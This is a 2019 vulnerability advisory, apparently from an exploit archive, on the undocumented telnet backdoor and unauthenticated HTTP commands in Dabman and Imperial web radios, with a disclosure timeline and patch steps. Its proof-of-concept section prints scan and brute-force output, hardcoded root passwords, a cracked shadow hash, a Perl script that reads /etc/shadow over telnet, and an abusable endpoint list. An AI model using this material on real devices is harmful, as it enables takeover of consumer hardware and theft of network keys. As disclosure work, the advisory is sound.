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Dabman And Imperial Web Radio Devices Undocumented Telnet Backdoor

Dabman And Imperial Web Radio Devices Undocumented Telnet Backdoor
Posted Sep 9, 2019
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Dabman and Imperial Web Radio Devices suffers from undocumented telnet backdoor and command execution vulnerabilities.

tags | exploit, web, vulnerability
advisories | CVE-2019-13473
SHA-256 | 6e28c900f138b4c227460279ef44595a12f751de44f3a06844fa9e9ce1c87e2a

Dabman And Imperial Web Radio Devices Undocumented Telnet Backdoor

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Document Title:
Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor
& Command Execution Vulnerability

References (Source):

Video: https://www.vulnerability-lab.com/get_content.php?id=2190

Vulnerability Magazine:



Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Vulnerability Class:

Current Estimated Price:
5.000€ - 10.000€

Product & Service Introduction:
Since 1993, TELESTAR has been synonymous with quality and a very good
price/performance ratio in the consumer electronics segment.
TELESTAR-DIGITAL GmbH distributes high-quality reception technology for
digital TV reception via satellite (DVB-S), cable (DVBC)
or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region
of Germany. The product portfolio includes digital receivers
and the latest generation of television sets as well as modern
distribution and single-cable technology, satellite to IP reception
solutions and radio transmission systems. The product range is rounded
off by Germany's most comprehensive range of accessories
for digital television reception.

(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )

Abstract Advisory Information:
The vulnerability laboratory research team discovered multiple
vulnerabilities in the dabman and imperial web radio devices series (typ
d & i).

Vulnerability Disclosure Timeline:
2018-06-01: Researcher Notification & Coordination (Security Researcher)
2018-06-02: Vendor Notification (Telestar Digital Data Security Department)
2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security
2018-08-30: Vendor Fix/Patch (Service Developer Team)
2019-09-08: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Exploitation Technique:

Severity Level:

Authentication Type:
Pre auth - no privileges

User Interaction:
No User Interaction

Disclosure Type:
Coordinated Disclosure

Technical Details & Description:
The dabman and imperial manufactured web radio series (typ d & i)
suffers from a weak password vulnerability.
The vulnerabilites allows local and remote attackers to compromise the
web radios full embedded linux busybox os.

The vulnerability is located within an undocumented telnet service
(telnetd) of the linux busybox and is
turned permanently on. The telnetd service uses weak passwords with
hardcoded credentials on the local embedded
linux busybox of the internet radio devices. The telnet password can be
cracked by usage of simple manual password
bruteforce technics or by basic automated attacks with scripts (exp.
ncrack). After receiving the password the
remote or local network attacker can unauthorized login to the internet
radio device to use the embedded linux
busybox operating system.

After the attacker has been logged in as root user, he can open the
/etc/ path to cat gshadow, shadow and the conf files.
At the end the attacker has finally full root access on the busybox
(telnetd), he can access the web-server (httpd) as
admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg.
A demo exploit poc is available in the wild.

Vulnerable Protocol(s):
[+] telnetd

[+] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)
(Debian Linux PreRelease - ARM 3.3.2)

Firmware Version(s):
[+] TN81HH96-g102h-g102

Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600

The dabman and imperial manufactured web radio series (typ d & i)
suffers from a command execution vulnerability.
The vulnerability allows local and remote attackers unauthorized and
unauthenticated send commands to comprimise the web radio devices.

The vulnerability is located httpd web-server communcation on port 80
and 8080. Local and remote attackers can send basic GET
commands with basic command line tools (exp. curl or modhttp) to modify
or manipulate http requests. The attacker can also capture
the http airmusic commands to reverse engineer the radio device for
unauthorized interactions. The system has no protection mechanism
to block unauthorized transmit of commands. The web radio as well not
owns an auth or reminder mechanism to ensure only allowed or
trusted sources can transmit the commands (client, system, mac , auth ...).

Vulnerable Protocol(s):
[+] httpd

[+] UIData (Web UI on 80 or 8080)

[+] /set_dname
[+] /mylogo
[+] /LocalPlay
[+] /LocalPlay
[+] /irdevice.xml
[+] /Sendkey
[+] /setvol
[+] /hotkeylist
[+] /init
[+] /playlogo.jpg
[+] /stop
[+] /exit
[+] /back
[+] /playinfo

[+] ?name=PWND
[+] ?url=./*.jpg
[+] ?url=/stream.wav&name=*
[+] ?url=/msg.wav&save=*
[+] ?key=*
[+] ?vol=*0&mute=*
[+] ?language=*

Affected Function(s):
[+] Air Music Controls

Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600

Proof of Concept (PoC):
1.1 Undocumented Telnet Service (telnetd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided
information and steps below to continue.

Nmap Portscan
Scanning R-MAVERIC-EMAC_1_01_018 ( [1000 ports]
Discovered open port 8080/tcp on
Discovered open port 80/tcp on
Discovered open port 23/tcp on
Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (
Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018
NSE: Script scanning
Initiating NSE at 14:48
Completed NSE at 14:49, 30.61s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for R-MAVERIC-EMAC_1_01_018 (
Host is up (0.010s latency).
Not shown: 997 closed ports
23/tcp open telnet security DVR telnetd (many brands)
80/tcp open tcpwrapped
|_http-title: AirMusic
8080/tcp open http BusyBox httpd 1.13
| http-methods:
|_ Supported Methods: GET
|_http-title: 404 Not Found
MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.16 - 2.6.35 (embedded)
Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=197 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])
C:Program Files (x86)Ncrack>ncrack -v --user root
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21
Mitteleuropõische Sommerzeit
Discovered credentials on telnet:// 'root' 'password'
Discovered credentials on telnet:// 'root' 'password1'
Discovered credentials on telnet:// 'root' 'password2'
Discovered credentials on telnet:// 'root' 'password123'
Discovered credentials on telnet:// 'root' 'password12'
Discovered credentials on telnet:// 'root' 'password3'
Discovered credentials on telnet:// 'root' 'password!'
telnet:// finished. Too many failed attemps.
Discovered credentials for telnet on 23/tcp: 23/tcp telnet: 'root' 'password' 23/tcp telnet: 'root' 'password1' 23/tcp telnet: 'root' 'password2' 23/tcp telnet: 'root' 'password123' 23/tcp telnet: 'root' 'password12' 23/tcp telnet: 'root' 'password3' 23/tcp telnet: 'root' 'password!'
Ncrack done: 1 service scanned in 273.29 seconds.
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117
Ncrack finished.

BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)


OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian

Built-in commands:
. : [ [[ bg break cd chdir continue echo eval exec exit export
false fg hash help jobs kill local printf pwd read readonly return
set shift source test times trap true type ulimit umask unset wait

Currently defined functions:
[, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,
gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc,
ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod,
run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,
udhcpd, umount, unlzma, usleep, zcat

Username: root
Password: password & password!

root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey)
ftp:!:0:::::: (decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond)


PoC: Exploit
use Net::Telnet ();
use Cwd;

# For local network change to localhost or local ip
@hosts = ("");

foreach $hostip (sort @hosts)
$t = new Net::Telnet (Timeout => 10,
Input_log => $file,
Prompt => "/>/");
print "nnConnecting to undocumented Telnet Service of Imperial or
Dabman Web Radio Service: $hostip ...n";
print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150,
i200, i200-cd, i400, i450, i500-bt, i600n";
my @lines = $t->cmd('cat /etc/shadow');
print "$hostip: Directories:n";
print "@lines n";

1.2 AirMusic Unauthenticated Command Execution (httpd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided
information and steps below to continue.

AirMusic Status Interface:
Web-Server HTTPD UIData Path:

Note: Attacks can be performed in the local network (Localhost:80) or
remotly by requesting the url remote ip adress ( +
forwarded remote port(Standard :23).

Get device name from Device

Set device name

Set boot-logo (HTTP URL, requirement: JPG)

Display or retrieve channel logo

Changing the main menu with the selected language

Play stream

Save audio file as message

Recall channel hotkeys

Current playback data

Set volume from 0-31 & mute function


Set stop

Activate all back

Send keystroke combo

PoC: Exploit
<title>Dabman & Imerpial - HTML AutoPwner</title>
<iframe src=></iframe>

PoC: Checker for Modifications

use strict;
use warnings;
use LWP::Simple;

my $url1 = '';
my $source1 = get( $url1 );

my $url2 = '';
my $source2 = get( $url2 );

print $source1;
print $source1;

Solution - Fix & Patch:
A fresh updated version is available by the manufacturer telestar to
resolve the vulnerabilities in all i & d series products.
It is recommended to install the updates as quick as possible to ensure
the digital security.

1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624

Security Risk:
The security risk of the vulnerabilities in the online web radio with
wifi and user interface are estimated as critical.
The vulnerability can be exploited by local attackers in a network or by
remote attackers without user interaction or
further privileged user accounts. The potential of the issue being
exploited in thousends of end user devices all over europe
is estimated as high. The issue has the potential that could be used by
remote attackers for spreading randomware / malware,
mass defacements, compromises for further linux network attacks or being
part of a criminal acting iot botnet.

Credits & Authors:

Disclaimer & Information:
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

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Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
Feeds: vulnerability-lab.com/rss/rss.php
Programs: vulnerability-lab.com/submit.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
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edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
SERVICE: www.vulnerability-lab.com

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